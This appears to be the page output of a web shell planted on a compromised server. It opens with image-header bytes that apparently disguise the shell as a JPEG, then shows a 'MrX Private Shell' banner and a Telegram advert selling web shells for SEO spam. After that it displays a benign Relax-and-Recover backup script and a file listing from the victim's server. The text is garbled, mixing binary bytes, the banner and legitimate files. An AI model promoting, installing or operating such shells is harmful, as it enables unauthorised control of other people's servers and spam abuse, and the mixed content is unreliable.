����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file is part of Relax-and-Recover, licensed under the GNU General
# Public License. Refer to the included COPYING for full text of license.
# At SLES11 /usr/bin/python is a link to ./python2.6
# and because copy failed with an error "cp: not writing through dangling symlink"
# we need to put in the link target ...
PYTHON="$(which python)"
if [ -h "$PYTHON" ]; then
PYTHON_BIN=$(basename $(readlink "$PYTHON"))
else
PYTHON_BIN="$PYTHON"
fi
REQUIRED_PROGS+=( "$PYTHON_BIN" )
COPY_AS_IS+=(
/etc/python
/etc/python2.6
/etc/python2.7
/usr/lib/pymodules
/usr/lib/pyshared
/usr/lib/python2.6
/usr/lib64/python2.6
/usr/lib64/python2.6/lib-dynload
/usr/lib64/python2.6/site-packages
/usr/lib/python2.7
/usr/lib64/python2.7
/usr/lib/python3
/usr/lib/python3.1
/usr/share/pycentral-data
/usr/share/pyshared
/usr/share/pyshared-data
/usr/share/python
/usr/share/python-apt
/usr/share/python-support
/var/lib/pycentral
/usr/include/python2.6/pyconfig-64.h
/usr/include/python2.7/pyconfig.h
)
LIBS+=(
/usr/lib/librsync.so.1.0.2
/usr/lib64/librsync.so.1
/usr/lib64/libexpat.so.1
/lib/libexpat.so.1
/lib/x86_64-linux-gnu/libexpat.so.1
/usr/lib/cruft
)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 050_prep_python.sh | File | 1.13 KB | 0644 |
|
| 070_set_backup_archive.sh | File | 19.52 KB | 0644 |
|
| 200_selinux_in_use.sh | File | 3.02 KB | 0644 |
|
| 400_prep_yum.sh | File | 3.57 KB | 0644 |
|